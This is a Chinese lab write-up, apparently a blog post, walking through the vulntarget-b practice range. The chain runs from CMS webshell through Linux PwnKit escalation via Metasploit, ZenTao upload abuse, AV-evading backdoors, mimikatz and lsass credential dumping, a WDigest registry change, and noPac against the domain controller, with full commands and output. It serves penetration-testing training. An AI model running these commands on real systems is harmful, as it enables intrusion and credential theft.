关注WX:【小白SEC】查看更多内容……
本文仅为学习【vulntarget】,在本地环境测试验证,无其它目的,请勿进行未经授权的测试
一、靶场信息:
下载地址:
百度云:
链接: https://pan.baidu.com/s/1Hdqkojmu-CeIuPr2gLWHwA
提取码:s4ka
**拓扑图:**IP信息根据本地搭建环境自行配置改变
官方WP:vulntarget漏洞靶场系列(二)— vulntarget-b
二、使用到的工具、漏洞或技术:
工具:
Viper、nmap、蚁剑
漏洞或技术:
极致cms相关漏洞、禅道cms相关漏洞、隧道代理、免杀、CVE-2021-1732 、CVE-2021-42287/CVE-2021-42278
三、步骤:
-
通过端口扫描工具,查找靶机IP及端口信息,此处靶机的IP为192.168.100.19,直接扫描靶机IP信息
-
依次访问靶机的端口,发现81端口打开为极致CMS:
- 此处利用极致CMS后台getshell,访问admin.php,抓包进行密码爆破,得到密码
admin23
:
- 获取密码后,登陆后台后依次点击:插件管理 - 插件列表 - 搜索【在线编辑】
- 点击右侧【下载】按钮进行下载,下载成功后点击【安装】,安装完成后再点击【配置】,在弹出的页面随意输入用户名和密码点击2次【立即提交】即可:
- 在新打开的页面点击【登录】:
- 进入文件管理器后,可以任意新建、上传或修改文件进行传入webshell,此处选择将index.php修改为webshell,双击index.php文件,再点击【编辑】:
- 写入一句话后点击右上角【save】:
- 再次访问首页,出现phpinfo,即webshell写入成功,使用蚁剑连接:
- viper开启监听,此处要选择linux的payload:
- 生成elf格式后门:
- 将elf文件上传至靶机,再执行的时候发现宝塔禁用函数,此处使用蚁剑插件进行绕过:
- 使用插件绕过后,添加执行权限,并执行centos.elf文件:
- 返回viper查看,centos已上线,但是权限较低,需要进行提权:
- 打开MSFCONSOLE,进入centos的session,查找可提权模块:
msf6 > msf6 > msf6 > sessions 1
[*] Starting interaction with 1...
meterpreter > run post/multi/recon/local_exploit_suggester
[*] 192.168.100.19 - Collecting local exploits for x64/linux...
[*] 192.168.100.19 - 187 exploit checks are being tried...
[+] 192.168.100.19 - exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec: The target is vulnerable.
[+] 192.168.100.19 - exploit/linux/local/network_manager_vpnc_username_priv_esc: The service is running, but could not be validated.
[+] 192.168.100.19 - exploit/linux/local/pkexec: The service is running, but could not be validated.
[+] 192.168.100.19 - exploit/linux/local/su_login: The target appears to be vulnerable.
[+] 192.168.100.19 - exploit/linux/local/sudo_baron_samedit: The target appears to be vulnerable. sudo 1.8.23 is a vulnerable build.
[+] 192.168.100.19 - exploit/linux/local/sudoedit_bypass_priv_esc: The target appears to be vulnerable. Sudo 1.8.23 is vulnerable, but unable to determine editable file. OS can NOT be exploited by this module
[*] Running check method for exploit 63 / 63
[*] 192.168.100.19 - Valid modules for session 1:
============================
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec Yes The target is vulnerable.
2 exploit/linux/local/network_manager_vpnc_username_priv_esc Yes The service is running, but could not be validated.
3 exploit/linux/local/pkexec Yes The service is running, but could not be validated.
4 exploit/linux/local/su_login Yes The target appears to be vulnerable.
5 exploit/linux/local/sudo_baron_samedit Yes The target appears to be vulnerable. sudo 1.8.23 is a vulnerable build.
meterpreter >
- 此处使用
exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
进行提权,进行如下设置后,输入 run 运行,稍后可看见root权限session上线:
meterpreter > bg[*] Backgrounding session 1...
msf6 > use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > options
Module options (exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec):
Name Current Setting Required Description
---- --------------- -------- -----------
PKEXEC_PATH no The path to pkexec binary
SESSION yes The session to run this module on
WRITABLE_DIR /tmp yes A directory where we can write files
Payload options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.64.178 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 x86_64
View the full module info with the info, or info -d command.
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LPORT 1112
LPORT => 1112
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set session 1
session => 1
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > run
[*] Started reverse TCP handler on 192.168.64.178:1112
[*] Running automatic check ("set AutoCheck false" to disable)
[!] Verify cleanup of /tmp/.csgzrd
[+] The target is vulnerable.
[*] Writing '/tmp/.vgugzbmkrnb/ngaufeqwitog/ngaufeqwitog.so' (548 bytes) ...
[!] Verify cleanup of /tmp/.vgugzbmkrnb
[*] Sending stage (3016644 bytes) to 192.168.64.42
[+] Deleted /tmp/.vgugzbmkrnb/ngaufeqwitog/ngaufeqwitog.so
[+] Deleted /tmp/.vgugzbmkrnb/.jexrlg
[*] Meterpreter session 2 opened (192.168.64.178:1112 -> 192.168.64.42:1103) at 2023-06-27 08:09:30 +0000
meterpreter >
- 添加路由,并扫描内网资产:
- 扫描发现内网10.0.20.66存在3306、3389、8080端口,配置代理,进行访问:
- 没法爆破,使用提示的账号密码登录:admin/Admin123
- 查看版本信息,为禅道12.4.2版本:
也可以通过调用接口查看版本信息:http://10.0.20.66:8080/index.php?mode=getconfig
- 利用禅道 12.4.2 后台任意文件上传漏洞进行getshell:
在centos的tmp目录下创建test.php的shell文件,使用python开启http服务:
构建URL为极致CMS中的index.php:HTTP://10.0.20.30:8081/test.php
再进行base64加密:SFRUUDovLzEwLjAuMjAuMzA6ODA4MS90ZXN0LnBocA==
通过URL请求:http://10.0.20.66:8080/index.php?m=client&f=download&version=1&link=SFRUUDovLzEwLjAuMjAuMzA6ODA4MS90ZXN0LnBocA==
- webshell上传成功后,访问URL无法访问,但是使用蚁剑可以连接成功:
- 准备上线MSF,通过centos的session转发上线win10,建立监听,生成后门程序:
- 生成的后门程序无法直接使用,因为win10存在杀软:
- 制作免杀后门程序,此次直接使用工具生成免杀,上传到win10中并执行,这一步我的蚁剑没法上传,使用冰蝎进行上传,并执行:
- Viper成功上线win10,低权限用户,需要进行提权:
- 此处可直接使用
getsystem
提权:
meterpreter > getsystem
...got system via technique 5 (Named Pipe Impersonation (PrintSpooler variant)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
- 使用kiwi,获取明文密码信息:
meterpreter > load kiwiLoading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
Success.
meterpreter > creds all
[-] Unknown command: creds
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============
Username Domain NTLM SHA1 DPAPI
-------- ------ ---- ---- -----
Administrator VULNTARGET 570a9a65db8fba761c1008a51d4c95ab 759e689a07a84246d0b202a80f5fd9e335ca5392 498266e09dee384e15ad686ed4de3822
Administrator WIN10 579da618cfbfa85247acf1f800a280a4 39f572eceeaa2174e87750b52071582fc7f13118
WIN10$ VULNTARGET dfda64c13ffda08549508af5e10824d0 67e0f7c22096658e1b897623c7ad877d4e1e1499
win101 VULNTARGET 282d975e35846022476068ab5a3d72df bc9ecca8d006d8152bd51db558221a0540c9d604 8d6103509e746ac0ed9641f7c21d7cf7
wdigest credentials
===================
Username Domain Password
-------- ------ --------
(null) (null) (null)
Administrator VULNTARGET (null)
Administrator WIN10 (null)
WIN10$ VULNTARGET (null)
win101 VULNTARGET (null)
kerberos credentials
====================
Username Domain Password
-------- ------ --------
(null) (null) (null)
Administrator VULNTARGET.COM Admin@123
Administrator WIN10 (null)
Administrator VULNTARGET.COM admin@123
WIN10$ vulntarget.com OE/MDy7v#-BBGb8qj/#kAkqw(aHS$r>@p/>%8`OK^tjpcJ?r&Fjgn!WN(/ta?X_E :/nF:A!v!qK5M.WzK:?`Wn!huUI0,kJQYMI'4tqypP<*GO_[R,=+z'!
win10$ VULNTARGET.COM (null)
win101 VULNTARGET.COM (null)
meterpreter >
- win10已成功拿下,现在使用noPac拿下域控,需要获取当前域账号win101的密码信息,此处使用对NTLM直接进行解密,获得明文密码:admin#123:
- 或者利用注册表和procdump+mimikatz获取密码:
修改注册表:reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
修改玩注册表后需要用户重新登录才能记录到密码信息,此处模拟用户使用win101账户登录
meterpreter > shell
Process 10356 created.
Channel 1 created.
Microsoft Windows [版本 10.0.18363.418]
(c) 2019 Microsoft Corporation。保留所有权利。
C:\inetpub\zentao\zentaopms\www\data\client\1>reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
操作成功完成。
C:\inetpub\zentao\zentaopms\www\data\client\1>
- 上传procdump到win10机器中,获取lsass文件:
C:\inetpub\zentao\zentaopms\www\data\client\1\lsass>procdump64.exe -accepteula -ma lsass.exe lsass.dmp
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
ProcDump v11.0 - Sysinternals process dump utility
Copyright (C) 2009-2022 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com
[12:13:26] Dump 1 initiated: C:\inetpub\zentao\zentaopms\www\data\client\1\lsass\lsass.dmp
[12:13:27] Dump 1 writing: Estimated dump file size is 46 MB.
[12:13:28] Dump 1 complete: 47 MB written in 1.5 seconds
[12:13:28] Dump count reached.
C:\inetpub\zentao\zentaopms\www\data\client\1\lsass>
- 本地使用mimikatz.exe进行读取:
mimikatz.exe "sekurlsa::minidump lsass.dmp""sekurlsa::logonPasswords full" exit
- 收集域信息:
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > sessions 10
[*] Starting interaction with 10...
meterpreter > run post/windows/gather/enum_domain
[+] Domain FQDN: vulntarget.com
[+] Domain NetBIOS Name: VULNTARGET
[+] Domain Controller: WIN-UH20PRD3EAO.vulntarget.com (IP: 10.0.10.100)
meterpreter >
- 添加路由后,开启代理,使用kali配置代理,使用noPac攻击,拿下域控:
- 完整链路图:
靶场WP持续更新……